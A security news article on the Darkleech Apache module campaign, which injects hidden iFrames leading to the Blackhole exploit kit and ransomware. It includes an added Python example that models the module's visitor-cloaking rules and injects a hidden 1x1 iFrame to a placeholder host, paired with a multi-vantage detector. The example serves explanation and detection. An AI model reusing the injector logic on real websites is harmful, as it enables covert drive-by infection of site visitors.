One of the most successful malware infection campaigns ever seen is still going strong, and researchers have come no closer to discovering how the attackers are compromising the web servers and the websites hosted on them.
The campaign uses the Darkleech Apache module to inject and rotate malicious iFrames on the websites’ pages, and the iFrames redirect some of the visitors to sites hosting the Blackhole exploit kit.
If the exploit kit succeeds in exploiting a vulnerability on a visitor’s computer, the victim is saddled with the Pony Loader and Sirefef Trojans and the Nymaim ransomware, which locks the computer and demands $300 to unlock it.
“This campaign has been going on for a very long time. Our data shows that the Blackhole instance has been active for more than 2 years, since at least February 2011,” shared ESET researcher Sebastien Duquette.
The problem security researchers have with tracking down and analyzing sites compromised in this campaign is that the iFrame is not injected for every visitor. The module serves a clean page to IP addresses belonging to security companies and hosting firms, to traffic arriving via specified search queries, and to IP addresses that have recently been attacked. A single fetch from a researcher’s workstation or a vendor’s scanner can therefore come back clean while ordinary visitors are being redirected.
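To make the selective injection described above, and the iFrame rotation mentioned earlier, concrete, here is an added illustration written for this page. It is not Darkleech’s code: the `ConditionalInjector` class is a hypothetical model of the visitor-filtering rules the article describes (excluded address ranges, referers carrying watched search terms, one hit per IP), the address blocks are RFC 5737 documentation ranges, and the redirector host `rotated-host.example` is a placeholder, not a real indicator. The `suspicious_iframes` and `probe` functions show the check a practitioner actually wants: fetch the same page from several vantage points and flag tiny or CSS-hidden iFrames, rather than trusting one clean response.

```python
"""Model of a conditional iframe injector plus a multi-vantage detector.

Added example for this page; not the malware's code. The selection rules,
IP ranges, referer test and URLs below are assumptions for illustration.
"""
import ipaddress
import re
from html.parser import HTMLParser

# Constructed data: RFC 5737 documentation ranges stand in for address
# blocks the injector treats as "security company / hosting firm" space.
EXCLUDED_NETS = [
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("192.0.2.0/24"),
]
# Assumed: visitors whose referer is a search for these terms get a clean page.
AVOIDED_SEARCH_TERMS = re.compile(r"[?&]q=[^&]*(malware|iframe|blackhole)", re.I)

CLEAN_PAGE = "<html><body><h1>Welcome</h1><p>Nothing to see.</p></body></html>"
# Placeholder redirector host (not a real indicator).
INJECTED_IFRAME = ('<iframe src="http://rotated-host.example/in.php" '
                   'width="1" height="1" style="visibility: hidden"></iframe>')


class ConditionalInjector:
    """Serves CLEAN_PAGE, appending the iframe only for 'eligible' visitors."""

    def __init__(self):
        self.already_served = set()   # IPs that have been hit once already

    def should_inject(self, client_ip, referer=None):
        ip = ipaddress.ip_address(client_ip)
        if any(ip in net for net in EXCLUDED_NETS):
            return False                        # researcher / hoster address space
        if referer and AVOIDED_SEARCH_TERMS.search(referer):
            return False                        # arrived via a watched search query
        if client_ip in self.already_served:
            return False                        # attacked recently: show clean page
        return True

    def serve(self, client_ip, referer=None):
        if not self.should_inject(client_ip, referer):
            return CLEAN_PAGE
        self.already_served.add(client_ip)
        return CLEAN_PAGE.replace("</body>", INJECTED_IFRAME + "</body>")


class _IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def suspicious_iframes(html):
    """Return src values of iframes that are 0x0/1x1 or hidden via CSS."""
    parser = _IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        tiny = all(attrs.get(d, "").strip() in ("0", "1") for d in ("width", "height"))
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = "visibility:hidden" in style or "display:none" in style
        if tiny or hidden:
            hits.append(attrs.get("src", ""))
    return hits


def probe(server, vantage_points):
    """Fetch the page as several (label, ip, referer) clients and report which
    vantage points received a suspicious iframe. Returns {label: [src, ...]}."""
    return {label: suspicious_iframes(server.serve(ip, referer))
            for label, ip, referer in vantage_points}


if __name__ == "__main__":
    srv = ConditionalInjector()
    results = probe(srv, [
        ("vendor scanner", "203.0.113.9", None),
        ("home user, 1st visit", "198.51.100.7", None),
        ("home user, 2nd visit", "198.51.100.7", None),
        ("via watched search", "198.51.100.8",
         "http://search.example/?q=site+iframe+malware"),
    ])
    for label, srcs in results.items():
        print(f"{label:22s} -> {srcs or 'clean'}")
```

Only the first-visit home user sees the iFrame; the scanner address, the repeat visit and the search-referred visitor all get the clean page, which is exactly why a one-off fetch from a security vendor’s network is the wrong way to confirm an infection. Against a real site the `serve` call would be replaced by HTTP fetches from varied source addresses, with and without referers, and ideally from a residential connection.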
According to ESET researchers, the campaign uses compromised cPanel and Plesk servers for the URL rotation, and more than 40,000 domains and IPs were used at some point in the rotation, 15,000 of which were active at the same time in May 2013.
“How did the cybercriminals manage to exert control over so many IPs and domains? By compromising the cPanel and Plesk panels used by many web hosting companies to manage their networks and sometimes control hundreds or thousands of websites,” Duquette explains.
But, once again, the researchers can’t figure out how access to the servers is initially obtained. “It might simply be through stolen passwords as the Pony Loader trojan contains code to steal credentials for protocols such as FTP and HTTP,” he concluded.
It is worth noting that another malicious Apache module (Cdorked), which also targets nginx and Lighttpd web servers, was detected back in March 2013, and it has puzzled ESET researchers in the same way.
“We still don’t know for sure how this malicious software was deployed on the web servers,” the researchers admitted at the time. “We believe the infection vector is not unique. It cannot be attributed solely to installations of cPanel because only a fraction of the infected servers are using this management software. One thing is clear, this malware does not propagate by itself and it does not exploit a vulnerability in a specific software.”
Lastly, Sucuri Security researchers have unearthed a new malicious Apache module used in a similar campaign. “We don’t know if it is a new and improved version of Darkleech or a completely different tool written by a different group. Our team is still working on the binary and trying to scope the reach of this infection,” they said, and the investigation continues.